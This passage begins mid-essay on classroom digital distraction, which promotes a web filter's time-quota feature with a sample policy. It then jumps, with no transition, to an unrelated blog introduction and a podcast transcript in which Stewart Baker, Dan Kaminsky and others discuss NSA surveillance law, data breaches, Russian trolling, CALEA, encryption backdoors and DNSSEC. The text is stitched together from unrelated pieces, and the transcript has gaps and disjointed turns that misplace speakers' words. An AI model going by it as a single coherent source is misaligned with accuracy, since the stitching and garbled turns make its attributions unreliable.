Then, when I entered the world of work, I found an environment not too dissimilar to school. There were managers to impress, friends to win, and office politics instead of playground politics. Comme ci, comme ça. But I was better informed this time, and found ways to stay focused: wearing headphones (a great way to show you’re otherwise engaged), meditation (limited to the park, never in the office), and writing to-do lists. But these are workplace tactics; if I were a student now, my report would probably be worse. I’d be lost with access to so many devices and so much time-wasting material.
So there, I’ve laid bare more than I should have, but I think my personal character assassination has been worth it, because it proves a point: kids have always been distracted; tech has just made the problem worse. In addition to the usual classroom distractions, teachers now have to manage digital distractions, and it’s all affecting students’ progress.


For the head of the Old Hall School in Telford, Martin Stott, observing this trend was worrying. He said, “It seems to me that children’s ability to take on board the instructions for multi-step tasks has deteriorated. For a lot of children, all their conversation revolves around these games. It upsets me to see families in restaurants and as soon as they sit down the children get out their iPads.” Stott isn’t the first to raise the issue of digital dependency (there are digital detox centers for adults who want a break from tech). He might, however, be the first to bring the issue to the education arena and get significant media coverage, by introducing a week-long digital embargo at his school. Students have to put away the Xboxes and iPads, and turn off the TV, in an attempt to discover other activities like reading, board games and cards.

I’m split on the whole digital detox idea. The cynic in me asks how a one-week break can make any real change to the amount of time kids spend on devices. And restricting them completely is a surefire way to spark rebellion. But my optimistic side says it’s a step in the right direction. It raises awareness by helping kids realize that there’s life outside Minecraft and social media. Now that’s not so bad.

Nonetheless, I do think that the problems with device dependency at Old Hall School could be solved with better filtering instead of a digital detox. As existing users will tell you, there’s a trusty little tool in our web filter known as ‘limit to quota’. Admins can configure the amount of time users can spend on different types of material, including material classified as time-wasting. According to predefined rules, users can use their allocation in bite-sized chunks, and be prompted every five or ten minutes with an alert stating how much they’ve used. That way there’ll be no nasty shocks; when the timer eventually runs out after 60 minutes, they’ll still be able to use the safe parts of the web that support their educational needs, without the distractions. Now that’s got to be more appealing than dropping the devices cold turkey, isn’t it?
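
Purely as an illustration, here is a hypothetical ‘limit to quota’ policy sketched as Python data; the field names are invented for the example, and real web-filter configurations vary by product.

    # Hypothetical quota policy (illustrative field names only).
    QUOTA_POLICY = {
        "category": "time-wasting",        # classification the quota applies to
        "daily_minutes": 60,               # total allowance per user per day
        "chunk_minutes": 10,               # allowance granted in bite-sized chunks
        "warn_every_minutes": 5,           # periodic "you've used X minutes" alerts
        "on_exhausted": "block_category",  # educational categories stay reachable
    }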


Talking with Stewart Baker

So I went ahead and did a podcast with Stewart Baker, former general counsel for the NSA and actually somebody I have a decent amount of respect for (Google set me up with him during the SOPA debate; he understood everything I had to say, and he really applied some critical pressure publicly and behind the scenes to shut that mess down).  Doesn’t mean I agree with the guy on everything.  I told him in no uncertain terms we had some disagreements regarding backdoors, and that if he asked me about them I’d say as much.  He was completely OK with this, and in today’s echo-chamber-loving society that’s a real outlier.  The debate is a ways in, and starts around here.

You can get the audio (and a summary) here but as usual I’ve had the event transcribed.  Enjoy!



Steptoe Cyberlaw Podcast-070

Stewart: Welcome to episode 70 of the Steptoe Cyberlaw Podcast brought to you by Steptoe & Johnson; thank you for joining us. We’re lawyers talking about technology, security, privacy in government and I’m joined today by our guest commentator, Dan Kaminsky, who is the Chief Scientist at WhiteOps, the man who found and fixed a major and very troubling flaw in the DNS system and my unlikely ally in the fight against SOPA because of its impact on DNS security. Welcome, Dan.

Dan: It’s good to be here.

Stewart: All right; and Michael Vatis, formerly with the FBI and the Justice Department, now a partner in Steptoe’s New York office. Michael, I’m glad to have you back, and I guess to be back with you on the podcast.

Michael: It’s good to have a voice that isn’t as hoarse as mine was last week.

Stewart: Yeah, that’s right, but you know, you can usually count on Michael to know the law – this is a valuable thing in a legal podcast – and Jason Weinstein, who took over last week in a coup in the Cyberlaw podcast and ran it and interviewed our guest, Jason Brown from the Secret Service. Jason is formerly with the Justice Department, where he oversaw computer crime prosecutions, among other things, and is now doing criminal and civil litigation at Steptoe.

I’m Stewart Baker, formerly with NSA and DHS, the record holder for returning to Steptoe to practice law more times than any other lawyer, so let’s get started. For old time’s sake we ought to do one more, one last hopefully, this week in NSA. The USA Freedom Bill was passed, was debated, not amended after efforts; passed, signed and is in effect, and the government is busy cleaning up the mess from the 48/72 hours of expiration of the original 215 and other sunsetted provisions.

So USA Freedom; now that it’s taken effect I guess it’s worth asking what does it do. It gets rid of bulk collection across the board, really. It says, “No, you will not go get stuff just because you might need it later; if you can’t get it from the guy who holds it, you’re not going to get it.” It does that for pen traps, it does that for Section 215, the subpoena program, and it most famously gets rid of the bulk collection program that NSA was running and that Snowden leaked in his first and apparently only successful effort to influence US policy.

[Helping] who are supposed to be basically Al Qaeda’s lawyers – that’s editorializing; just a bit – they’re supposed to stand for freedom and against actually gathering intelligence on Al Qaeda, so it’s pretty close. And we’ve never given the Mafia its own lawyers in wiretap cases before the wiretap is carried out, but we’re going to do that for –

Dan: To be fair you were [just] wiretapping the Mafia at the time.

Stewart: Oh, absolutely. Well, the NSA never really had much interest in the Mafia, but with Title 3, yeah; you went in and you said, “I want a Title 3 order,” and you got it if you met the standard in the view of the judge, and there were no additional lawyers appointed to argue against giving you access to the Mafia’s communications. And Michael, you looked at it as well – I’d say those were the two big changes – there are some transparency issues and other things – anything that strikes you as significant out of this?

Michael: I think the only other thing I would mention is the restrictions on NSLs where you now need to have specific selection terms for NSLs as well, not just for 215 orders.

Stewart: Yeah, really the House just went through and said, “Tell us what capabilities could be used to gather national security information and we will impose this specific selection term requirement on it.” That is really the main change, probably, for ordinary uses of 215 as though it were a criminal subpoena. Not that much change. I think the notion of relevance has probably always carried some notion that there is a point at which it gathered too much and the courts would have said, “That’s too much.”

Michael: I think the assumption going in was that, okay, telecoms already retain all this stuff for 18 months for billing purposes, and they’re required to by FCC regulation. But I think, as we’ve discussed before, they’re not really required to retain all the stuff that NSA has been getting under the bulk collection program, especially now that people have unlimited calling plans; telecoms don’t need to retain information about every number called because it doesn’t matter for billing purposes.

So I think, going forward, we’ll probably hear from NSA that they’re not getting all the information they need, so I don’t think this issue is going to go away forever now. I think we’ll be hearing complaints, and there will be some desire by the Administration to impose some sort of data retention requirements on telecoms, and then there will be a real fight.

Stewart: That will be a fight. Yeah, I have said recently that, sure, this new approach can be as effective as the old approach if you think that going to the library is an adequate substitute for using Google. They won’t be able to do a lot of the searching that they could do and they won’t have as much data. But on the upside there are widespread rumors that the database never included many smaller carriers, never included mobile data probably because of difficulties separating out location data from the things that they wanted to look at.

So privacy concerns have already sort of half crippled the program, and it also seems to me you have to be a remarkably stupid terrorist to think that it’s a good idea to call home using a phone that operates in the United States. People will use Call of Duty or something to communicate.

All right, the New York Times has one of its dumber efforts to create a scandal where there is none – it was written by Charlie Savage and criticized on Lawfare by Ben Wittes, and Charlie, who probably values his reputation in national security circles somewhat, wrote a really slashing response to Ben Wittes, but I think, frankly, Ben has the better of the argument.

The story says, “Without public notice or debate, the Obama Administration has expanded the NSA’s warrantless surveillance of Americans’ international Internet traffic to search for evidence of malicious computer hacking,” according to some documents obtained from Snowden. It turns out, if I understand this right, that what NSA was looking for in that surveillance, which is a 702 surveillance, was malware signatures and other indicia that somebody was hacking Americans, so they collected or proposed to collect the incoming communications from the hackers, and then to see what was exfiltrated by the hackers.

In what universe would you describe that as Americans’ international Internet traffic? I don’t think when somebody’s hacking me or stealing my stuff that that’s my traffic. That’s his traffic, and to lead off with that framing of the issue is clearly baiting somebody for an attempted scandal, and a complete misrepresentation of what was being done.

Dan: I think one of the issues is there’s a real feeling, “What are you going to do with that data?” Are you going to report it? Are you going to stop malware? Are you going to hunt someone down?

Stewart: All of it.

Dan: Where is the – really?

Stewart: Yeah.

Dan: Because there’s a lot of doubt.

Stewart: Yeah; I actually think that the FBI regularly – this was a program really to support the FBI in its mission – the FBI has a program that’s remarkably successful, in the sense that people are quite surprised when agents show up at the doors of folks who have been compromised to say, “By the way, you’re pwned,” and most of the time when they do that some people say, “What? Huh?” This is where some of that information almost certainly comes from.

Dan: The reality is, everyone always says, “I can’t believe Sony got hacked,” and many of us actually in the field go, “Of course we can believe it.” Sony got hacked because everybody’s hacked somewhere.

Stewart: Yes, absolutely.

Dan: There’s a real need to do something about this on a larger scale. There is just such a lack of trust going on out there.

Stewart: Oh yeah.

Dan: And it’s not without reason.

Stewart: Yeah; Jason, any thoughts about the FBI’s role in this?

Jason: Yeah. I think that, as you said, the FBI does a very effective job, either pushing out information generally through alerts about new malware signatures, or knocking on doors to tell particular victims they’ve been hacked. They don’t have to tell them how they know or what the source of the information is, but the information is still valuable.

I thought, to the extent that this is one of those things under 702, a reasonable person will look at this and be appreciative of the fact that the government was doing this, not critical. And as you said, the notion that stolen internet traffic from Americans is characterized as surveillance of Americans’ traffic is a little bit nonsensical.

Stewart: So without beating up Charlie Savage – I like him, he deserves it on this one – but he’s actually usually reasonably careful. The MasterCard settlement or the failed MasterCard settlement in the Target case, Jason, can you bring us up to date on that and tell us what lessons we should learn from it?

Jason: There have been so many high profile breaches in the last 18 months that people may not remember Target, which of course was breached in the holiday season of 2013. MasterCard, as credit card companies often do, tried to negotiate a settlement on behalf of all of its issuing banks with Target to pay damages for losses suffered as a result of the breach. In April, MasterCard negotiated a proposed settlement with Target that would require Target to pay about $19 million to the various financial institutions that had to replace cards and cover losses and things of that nature.

But three of the largest banks – in fact, I think the three largest MasterCard issuing banks, Citigroup, Capital One and JPMorgan Chase – all said no, indicated they would not support the settlement, and scuttled it because they thought $19 million was too small to cover the losses. Trade groups for the banks and credit unions say that between the Target and Home Depot breaches combined there were about $350 million in costs incurred by the financial institutions to reissue cards and cover losses, so even if you factor out the Home Depot portion of that, $19 million is a pretty small number.

So Target has to go back to the drawing board, as does MasterCard, to figure out if there’s a settlement or if the litigation is going to continue. And there’s also a proposed class action ongoing in Minnesota involving some smaller banks and credit unions as well. It would only cost Target $10 million to settle the consumer class action, but the bigger exposure is here with the financial institutions. Michael made reference last week to some press in which a commentator suggested the class actions from data breaches were on the wane, and we both are of the view that that’s just wrong.

There may be some decrease in privacy-related class actions involving misuse of private information by providers, but when it comes to data breaches involving retailers and credit card information, I think not only are the consumer class actions not going anywhere, but the class actions involving the financial institutions are definitely not going anywhere. Standing is not an issue at all. It’s pretty easy for these plaintiffs to demonstrate that they suffered some kind of injury; they’re the ones covering the losses and reissuing the cards, and depending on the size of the breach the damages can be quite extensive. I think it’s a sign of the times that in these big breaches you’ll find banks insisting on a much bigger pound of flesh from the victims.

Stewart: Yeah, I think you’re right about that. The settlements, as I saw when I did a quick study of settlements for consumers, are running between 50 cents and two bucks per exposure, which is not a lot, and the banks’ expenses for reissuing cards are more like 50 bucks per victim. But it’s also true that many of these cards are never going to be used; many of these numbers are never going to be used, and so spending 50 bucks for every one of them to reissue the cards, at considerable cost to the consumers as well, might be an overreaction, and I wouldn’t be surprised if that were an argument.

Dan: So my way of looking at this is from the perspective of deterrence. Is $19 million enough of a cost to Target to cause them to change their behavior and really invest? It’s going to be extraordinarily expensive to migrate our payment system to the reality, which is that we have online verification. We can use better technologies. They exist. There are a dozen ways of doing it that don’t lead to a password to your money all over the world. This is ridiculous.

Stewart: It is.

Dan: I’m just going to say the big banks have a point; $19 million is –

Stewart: Doesn’t seem like a lot.

Dan: – to say, “We really need to invest in this; this never needs to happen again,” and I’m not saying $350 million is the right number, but I’ve got to agree, $19 million is not.

Stewart: All right then. Okay, speaking of everybody being hacked, everybody includes the Office of Personnel Management.

Dan: Yeah.

Stewart: I got a copy of my first background investigation, and it was quite amusing because the government, in order to protect privacy, blacked out the names of all the investigators, whom I wouldn’t have known from Adam, but left in all my friends’ names as they’re talking about my drug use, or not.

Dan: Alleged.

Stewart: Exactly; no, they were all stand-up guys for me, but there is a lot of stuff in there that could be used for improper purposes, and it’s perfectly clear that if the Chinese stole this, stole the Anthem records, the health records, they are living the civil libertarian’s nightmare about what NSA is doing. They’re actually building a database about every American in the country.

Dan: Yeah, a little awkward, isn’t it?

Stewart: Well, annoying at least; yes. Jason, I don’t know if you’ve got any thoughts about how OPM responds to this? They apparently didn’t exactly cover themselves with glory in responding to an IG report from last year saying, “Your systems suck so bad you ought to turn them off.”

Jason: Well, first of all, as your lawyer I should say that your alleged drug use was outside the limitations period of any federal or state government that I’m aware of, so no one should come after you. I thought it was interesting that they were offering credit monitoring, given that the hack has been attributed to China, which I don’t think is having any money issues or is going to steal my credit card information.

I’m pretty sure that the victims include the three of us, so I’m looking forward to getting that free 18 months of credit monitoring. I guess they’ve held out the possibility that the theft was for profit as opposed to for espionage purposes, and the possibility that the Chinese actors are not state-sponsored actors, but that seems kind of nonsensical to me. And I think, as you both said, that the Chinese are building the very database on us that Americans feared the United States was building.

Stewart: Yeah, and I agree with you that credit monitoring is a sort of lame and bureaucratic response to this. Instead, they really ought to have the FBI and the counterintelligence experts ask, “What would I do with this data if I were the Chinese?” and then ask people whose data has been exploited to look for that kind of behavior. Knowing how the Chinese do their recruiting, I’m guessing they’re looking for people who have family still in China – grandmothers, mothers and the like – and who also work for the US government, and they will recruit them on the basis of ethnic and patriotic duty. And so folks who are in that situation could have their relatives visited for a little chat; there’s a lot of stuff that is unique to Chinese use of this data that we ought to be watching for a little more aggressively than credit theft.

Stewart: Yeah; well, that’s all we’ve got when it’s hackers. We should think of a new response to this.

Dan: We should, but like all hacks [attribution] is a pain in the butt because here’s the secret – hacking is not hard; teenagers can do it.

Stewart: Yes, that’s true.

Dan: [Something like this can take just] a few months.

Stewart: But why would they invest?

Dan: Why not? Data has value; they’ll sell it.

Stewart: Maybe; so that’s right. On the other hand the Anthem data never showed up in the markets. We have better intelligence than we used to. We’ll know if this stuff gets sold and it hasn’t been sold because – I don’t want to give the Chinese ideas but –

Dan: I don’t think they need you to give them ideas; sorry.

Stewart: One more story, just to show that I was well ahead of the Chinese on this – for my first security clearance they asked me for people with whom I had obligations of affection or loyalty who were foreigners. And I said, I’m an international lawyer – this was before you could just print out your Outlook contacts – so I Xeroxed all those sheets of business cards that I’d collected, and I sent them to the guy and said, “These are all the clients or people I’ve pitched,” and he said, “There are like 1,000 names here.” I said, “Yeah, these are people that I either work for or want to work for.” And he said, “But I just want people to whom you have ties of obligation or loyalty or affection.” I said, “Well, they’re all clients and I like them and I have obligations to clients, or I want them to be; I’ve pitched them.” And he finally stopped me and said, “No, no, I mean are you sleeping with any of them?” So good luck, China, figuring out which of them, if any, I was actually sleeping with.

Dan: You see, you gave up all those names to China.

Stewart: They’re all given up.

Dan: Look what you did!

Stewart: Exactly; exactly. Okay, last topic – Putin’s trolls – I thought this was fascinating. This is where the New York Times really distinguished itself, because this article told us something we didn’t know and shed light on something kind of astonishing. This is the Internet Research Agency, I think – their army of trolls. The Chinese have an even larger army of trolls, and essentially Putin’s FSB has figured out that if you don’t want to have a Facebook revolution or a Twitter revolution you need to have people on Twitter, on Facebook 24 hours a day, posting comments and turning what would otherwise be evidence of dissent into a toxic waste dump, with people trashing each other, going off in weird directions, saying stupid things to the point where no one wants to read the comments anymore.

It’s now a policy. They’ve got a whole bunch of people doing it, and on top of it they’ve decided, “Hell, if the US is going to export Twitter and Twitter revolutions, then we’ll export trolling” – to the point where they’ve started making up chemical spills and tweeting them with realistic video, with people weighing in to say, “Oh yeah, I can see it from my house; look at those flames.” All completely made up, and done as though it were happening in Louisiana.

Dan: The reality is that for a long time the culture was managed. We had broadcasts, broadcasters had direct government links, everything was filtered, and the big experiment of the internet was: what if we just remove those filters? What if we just let the people manage it themselves? And astroturfing did not start with Russia; there’s been astroturfing for years. It’s where you have these people making fake events and controlling the message. What is changing is the scale of it. What is changing is who is doing it. What is changing is the organization and the amount of investment. You have people who are professionally operating to reduce the credibility of Twitter, of Facebook, so that, quote/unquote, the only thing you can trust is the broadcast.

Stewart: I think that’s exactly right. I think they call the Chinese version of this the 50 Cent Army, because they get 50 cents a post. But I guess I am surprised that the Russians would do that to us in what is plainly an effort to test whether they could totally disrupt our emergency response. It didn’t do much in Louisiana, but it wouldn’t be hard, in a more serious crisis, for them to create panic, doubt and uncertainty about the reliability of a whole bunch of media in the United States.

This was clearly a dry run, and our response to it was pretty much nothing. I would have thought that the US government would say, “No, you don’t create fake emergencies inside the United States by pretending to be US news media.”

Jason: I was going to say – all those alien sightings in Roswell over the last 50 years, do you think those were Russia or China?

Stewart: Well, they were pre-Twitter; I’m guessing not, but from now on I think we can assume they are.

Dan: What it all comes back to is the crisis of legitimacy. People do not trust the institutions that are around them. If you look, there’s too much manipulation, too much spin, too many lies, and as it happens institutions are not all bad. Like, you know what? Vaccines are awesome. But because we have this lack of legitimacy, people are looking to find the thing they’re supposed to be paying attention to, because the normal stuff keeps turning out to be a lie. And really, what Russia’s doing here is just saying, “We’re going to find the things that you turn to instead, the things you think aren’t lying, and we’re going to lie there too, because what we really want is for America to stop airing our dirty laundry through this Twitter thing, and if America is not going to regulate Twitter we’re just going to go ahead and make a mess of it too.”

Stewart: Yeah. I think their view is, “Well, Twitter undermines our legitimacy; we can use it to undermine yours.”

Dan: Yeah, Russians screwing with Americans; more likely than you think.

Michael: I’m surprised you guys see it as an effort to undermine Twitter; this strikes me as classic KGB disinformation tactics, and it seems to me they’re using a new medium and, as you said before, they’re doing dry runs so that when they actually have a need to engage in information operations against the US or against Ukraine or against some other country, they’ll know how to do it. They’ll have practiced corps of trolls who know how to do this stuff in today’s media. I don’t think they’re trying to undermine Twitter.

Stewart: One of the things that’s interesting is that the authoritarians have figured out how to manage their people using electronic tools. They were scared to death by all of this stuff ten years ago, and they’ve responded very creatively, very effectively, to the point where I think they can maintain an authoritarian regime for a long time, without totalitarianism but still very effectively. And now they’re in the process of saying, “Well, how can we use these tools as a weapon?” the way they perceive the US to have used these tools as weapons in the first ten years of social media. We need a response, because they’re not going to stop doing it until we have one.

Michael: I’d start with the violation of the missile treaty before worrying about this so much.

Stewart: Okay, so maybe this is of a piece with the Administration’s strategy for negotiating with Russia, which is to hope that the Russians will come around. The Supreme Court had a ruling in the case we talked about a while ago; this is the guy who wrote really vile and threatening and scary things about his ex-wife and the FBI agent who came to interview him, and who said afterwards, after he’d posted on Facebook and was arrested for it, “Well, come on, I was just doing what everybody in hip hop does; you shouldn’t take it seriously. I didn’t.” The Supreme Court was asked to decide whether the test for a threat is the understanding of the writer or the understanding of the reader. At least that’s how I read it, and they sided with the writer, with the guy who wrote all those vile things. Michael, did you look more closely at that than I did?

Michael: The court read into it a requirement that the government has to show at least that the defendant sent the communication with the purpose of issuing a threat or with the knowledge that it would be viewed as a threat, and it wasn’t enough for the government to argue and a jury to find that a reasonable person would perceive it as a threat.

So you have to show at least knowledge or purpose or intent, and it left open the question whether recklessness as to how it would be perceived was enough.

Stewart: All right; well, I’m not sure I’m completely persuaded, but it probably also doesn’t have enough to do with CyberLaw in the end to pursue. Let’s close up with one last topic, which is that the FBI is asking for, or talking about, expanding CALEA to cover social media – to cover communications that go out through direct messaging and the like – saying it’s not that they haven’t gotten cooperation from social media when they wanted a wiretap; it’s just that in many cases the companies haven’t been able to do it quickly enough, and we need to set some rules in advance for their ability to do wiretaps.

This is different from the claim that they’re Going Dark and that they need access to encrypted communications; it really is an effort to actually change CALEA – the Communications Assistance for Law Enforcement Act of 1994, which imposed that obligation on phone companies and then later on voice-over-IP providers. Jason, what are the prospects for this? How serious a push is this?

Jason: Well, prospects are – it’s DOA – but just to put it in a little bit of historical perspective: Going Dark has of late been the name for the FBI’s effort to deal with encryption, but the original use of that term, at least in 2008/2009 when the FBI started a legislative push to amend CALEA and extend it to internet-based communications, was for that effort. They would routinely cite the fact that there was a very significant number of wiretaps, in both criminal and national security cases, that providers not covered by CALEA didn’t have the technical capability to implement.

So it wasn’t about law enforcement having the authority to conduct a wiretap; they by definition had already developed enough evidence to satisfy a court that they could meet the legal standard. It was about the provider’s ability to help them execute that authority they already had. As you suggested, either the wiretap couldn’t be done at all, or the provider and the government would have to work together to develop a technical solution, which could take months and months, by which time the target wasn’t using that method of communication anymore; he had moved on to something else.

So for the better part of four years – my last four years at the department – the FBI was pushing, along with DEA and some other agencies, for a massive CALEA reform effort to expand it to internet-based communications. At that time – this is pre-Snowden; it’s certainly truer now – it was viewed as a political non-starter to try to convince providers that CALEA should be expanded.

So they downshifted, as a Plan B, to try to amend Title 18 – and I think there were some parallel amendments to Title 50 – but the Title 18 amendments would have dramatically increased the penalties for providers that didn’t have the capability to implement a valid wiretap order that law enforcement served.

There would be this graduated series of penalties that would essentially create a significant financial incentive for a provider to have an intercept capability in advance, or to be able to develop one quite quickly. So the FBI, although it wanted CALEA to be expanded, was willing to settle for this sort of indirect way to achieve the same thing: to incentivize providers to develop intercept solutions.

That was an unlikely bill to make it to the Hill, and to make it through the Hill, before Snowden; after Snowden I think it became political plutonium. It was very hard, even before Snowden, to explain to people that this was not an effort to expand authorities; it was about executing those authorities. That argument became almost impossible to make in the post-Snowden world.

What struck me about this story, though, is that they appear to be going back to Plan A, which is trying to go in the front door and expand CALEA. The only way I can interpret it is that either the people running this effort now are unaware of the previous history, or they’ve just decided, what the hell, they have nothing to lose. They’re unlikely to get it through anyway, so they might as well ask for what they want.

Stewart: That’s my impression. There isn’t any likelihood in the next two years that encryption is going to get regulated, but the Justice Department and the FBI are raising this issue, I think, partly on a what-the-hell basis – this is what we want, this is what we need, we might as well say so – and partly, I think, as preparation of the battle space for the time when they actually have a really serious crime that everybody wishes had been solved and that can’t be solved because of some of these technical gaps.

Dan: You know what drives me nuts? We’re getting hacked left and right; we’re leaking data left and right, and all these guys can talk about is how they want to leak more data. Like, when we finish here, this is about encryption. It’s, “We’re not saying we’re banning encryption, but if there’s encryption and we can’t get through it we’re going to have a graduated series of costs, or we’re going to pull CALEA into this.” There are entire classes of software we need to protect American business that are very difficult to invest in right now. It’s very difficult to know, in the long term, that you’re going to get to run it.

Stewart: Well, actually my impression is that VCs are falling all over themselves to fund people who say, “Yeah, we’re going to stick it to the NSA.”

Dan: Yeah, but those of us who actually know what we’re doing know that whatever we’re doing – whatever would actually work – is actually under threat. There are lots of scammers out there; oh my goodness, there is some great, amazing, 1990s-era snake oil going on, but the smart money is not too sure we’re going to get away with securing anything.

Stewart: I think that’s probably right; why don’t we just move right in, because I had promised I was going to carry this question over from the news roundup – Julian Sanchez raised it; I raised it with Julian on a previous podcast. We were talking about the effort to get access to encrypted communications, and I mocked the people who said, “Oh, you can never provide access without risk; that’s always a bad idea.” And I said, “No, come on.” Yes, it creates a security risk, and you have to manage it, but sometimes the security risk and the cost of managing it are worth it because of the social values.

Dan: Sometimes you lose 30 years of background check data.

Stewart: Yeah, although I’m not sure they would have. I’m not sure how encryption, especially encryption of data in motion, would have changed that.

Dan: It’s a question of can you protect the big magic key that gives you access to everything on the Internet, and the answer is no.

Stewart: So let me point to the topic that Julian didn’t want to get into because it seemed to be more technical than he was comfortable with, which is –

Dan: Bring it on.

Stewart: Exactly. I said, “Are you kidding me? End-to-end encryption?” The only end-to-end encryption that has been adopted universally on the internet since encryption became widely exportable is SSL/TLS. That’s everywhere; it’s default.

Okay, but SSL/TLS is broken every single day by the thousands, if not the millions, and it’s broken by respectable companies. In fact, probably every Fortune 500 company insists that SSL has to be broken at their firewall.

And they do it; they do it so that they can inspect the traffic to see whether some hacker is exfiltrating the –

Dan: Yeah, but they’re inspecting their own traffic. Organizations can go ahead and balance their benefits and balance their risks. When it’s an external actor it’s someone else’s risk. It’s all about externality.

Stewart: Well, yes, okay; I grant you that. But the point is, the idea that building in access is always a stupid idea, never worth it – that’s just wrong, or at least it’s inconsistent with the security practices that we have today. And probably, if anything, some of the things that companies like Google and Facebook are doing to promote SSL are going to result in more exfiltration of data. People are already exfiltrating data through Google properties, because Google insists that it be whitelisted from these intercepts.

Dan: What’s increasingly happening is that corporations are moving the intercept and DLP and analytics role to the endpoint because operating it as a midpoint just gets slower and more fragile day after day, month after month, year after year. If you want security, look, it’s your property, you’re a large company, you own 30,000 desktops, they’re your desktops, and you can put stuff on them.

Stewart: But the problem the companies have – weighing the importance of end-to-end encryption for security against the importance of being able to monitor activity for security – is that they have come down and said, “We have to be able to monitor it; we can’t just assume that every one of our users is operating safely.” That’s a judgment that society can make just as easily. Once you’ve had the debate, society can say, “You know, on the whole, weighing the privacy of everybody in our country against the risks of criminals misusing that data, we’re prepared to take some risk on the security side – to have less effective end-to-end encryption – in order to make sure that people cannot get away with breaking the law with impunity.”

Dan: Here’s the thing, though – society has straight out said, “We don’t want bulk surveillance.” If you want to go ahead and monitor individuals, and you have a reason to monitor, that’s one thing but –

Stewart: But you can’t monitor all of them if they’ve been given end-to-end – I agree with you, there’s a debate; I’m happy to continue debating it, but I’ve lost so far. But say, no, it’s this guy; this guy, we want to listen to his communications, we want to see what he is saying on that encrypted tunnel. You can’t break that just by stepping into the middle of it unless you already own his machine.

Dan: Yeah, and it’s unfortunately the expensive road –

Stewart: – because they don’t do any good.

Dan: – isn’t there. It isn’t the actual thing.

Stewart: It isn’t here – I’m over at Stanford and we’re at the epicenter of contempt for government, but everybody gets a vote. You get a vote if you live in Akron, Ohio, too, but nobody in Akron gets a vote about whether their end-to-end encryption is going to be deployed.

Dan: You know, look, average people, normal people have like eight secure messengers on their phone. Text messaging has fallen off a cliff; why? At the end of the day it’s because people want to be able to talk to each other and not have everyone spying on them. There’s a cost, there’s an actual cost to spying on the wrong people.

Stewart: There is?

Dan: If you go ahead and you make everyone your enemy you find yourself with very few friends. That’s how the world actually works.

Stewart: All right; I think we’ve at least agreed that there’s routine breakage of the one end-to-end encryption methodology that has been widely deployed. I agree with you, people are moving away from man-in-the-middle interception and are looking for ways to break into systems at the endpoint or close to the endpoint. Okay; let’s talk a little bit, if we can, about DNSSEC, because we had a great fight over SOPA and DNSSEC, and I guess the question for me is – well, maybe you can give us two seconds or two minutes on what DNSSEC is and how it’s doing in terms of deployment.

Dan: DNSSEC, at the end of the day, makes it as easy to get encryption keys as it is to get the address for a server. Crypto should not be drama. You’re a developer, you need to figure out how to encrypt something: hit the encrypt button, move on with your life. You write your app. That’s how it needs to work.

DNS has been a fantastic success at providing addressing to the internet. It would be nice if keying was just as easy, but let me tell you, how do you go out and talk to all these internet people about how great DNSSEC is when, really, it’s very clear about DNS itself – it’s not like the SOPA fights aren’t going to come back –

Stewart: Yeah; well, maybe.

Dan: – and it’s not like the security establishment, which should be trying to make America safer, isn’t saying, “Man, we really want to make sure we get our keys in there.” When that happens, [it doesn’t work]. It’s not that DNSSEC isn’t a great technology, but it really depends on politically [the DNS and its contents] being sacrosanct.

Stewart: Obviously, DHS and OMB committed to getting DNSSEC deployed at the federal level, and so their enthusiasm for DNSSEC has been substantial. Are you saying that they have undermined that in some way that –

Dan: The federal government is not monolithic; two million employees, maybe more, and what I’m telling you is that the security establishment keeps saying, “Hey, we’ve got to be able to get our keys in there too,” and so we’ve got this dual-mission problem going on here. Any system with a dual mission – no one actually believes there’s a dual mission, okay?

If the Department of Transportation was like, “Maybe cars should crash from time to time,” or if Health and Human Services was like, “Hey, you know, polio is kind of cool for killing some bad guys,” no one would take those vaccines, because maybe it’s the other mission. And that’s kind of the situation we have right here. Yeah, DNSSEC is a fantastic technology for key distribution, but we have no idea what you’re going to do with it five years from now, and so instead it’s being replaced with garbage. [EDIT: This is rude, and inappropriate verbiage.]

I’m sorry, I know people are doing some very good work, but let me tell you, their value-add is a bunch of centralized systems that all say, “But we’re going to stand up to the government.” I mean, that’s the value-add, and it never scales, it never works, but we keep trying because we’ve got to do something, because it’s a disaster out there. And honestly, anything is better than what we’ve got, but what we should be doing is DNSSEC, and as long as you keep making this noise we can’t do it.

Stewart: So DNSSEC is up to what? Ten percent deployment?

Dan: DNSSEC needs a round of investment that makes it a turnkey switch.

Stewart: Aah!

Dan: DNSSEC could be done [automatically] but every server just doesn’t. We [could] just transition the internet to it. You could do that. The technology is there but the politics are completely broken.

Stewart: Okay; last set of questions. You’re the Chief Scientist at WhiteOps, so let me tell you what I think WhiteOps does and then you can tell me what it really does. I think of WhiteOps as having made the observation that the hackers who are getting into our systems are doing it from a distance. They’re sending bots in to pack up and exfiltrate data. They’re logging on, and bots look different from human beings when they type stuff, and the people who are trying to manage an intrusion remotely also look different from somebody who is actually on the network. What WhiteOps is doing is saying, “We can find those guys and stop them.”

Dan: And that’s exactly what we’re doing. Look, I don’t care how clever your buffer overflow is; you’re not teleporting in front of a keyboard, okay? That’s not going to happen. So our observation is that we have this very strong signal. It’s not perfect, because sometimes people VPN in, sometimes people make scripted processes.

Stewart: But they can’t keep a VPN up for very long?

Dan: [If somebody is remotely] on the machine, you can pick it up in JavaScript. So a website that’s being lilypad-accessed – either through bulk communications with command and control to a bot, or through interaction with a remote control – churns out weak signals that we’re able to pick up in JavaScript.

Stewart: So this sounds so sensible and so obvious that I guess my question is how come we took this long to have that observation become a company?

Dan: I don’t know, but we built it. The reality is that it requires knowledge of a lot of really interesting browser internals. At WhiteOps we’ve been breaking browsers for years, so we’re basically taking all these bugs that never actually let you attack the user but that have completely different responses inside of a bot environment. That’s kind of the secret sauce.

Every browser is really a core object that reads HTML5, JavaScript, video – all the things you’ve got to do to be a web browser. Then there’s like this goop, right? It puts things on the screen, it has a back button, it has an address bar, it lets you configure stuff. It turns out that the bots use the core, not the goop.

Stewart: Oh yeah, because the core enables them to write one script for everything?

Dan: Yeah, so you have to think of bots as really terribly tested browsers and once you realize that it’s like, “Oh, this is barely tested, let’s make it break.”

Stewart: Huh! I know you’ve been doing work with companies looking for intrusions. You’ve also been working with advertisers, trying to find people who are basically engaged in click fraud. Any stories you can tell about catching people on well guarded networks?

Dan: I think one story I really enjoy – we actually ran the largest study of ad fraud that had ever been done of its nature. We found that there’s going to be about $6 billion of ad fraud – the study is at http://whiteops.com/botfraud – and we had this one case. So we tell the world we’re going to go ahead and run this test in August and find all the fraud. You know what? We lied. We do that sometimes.

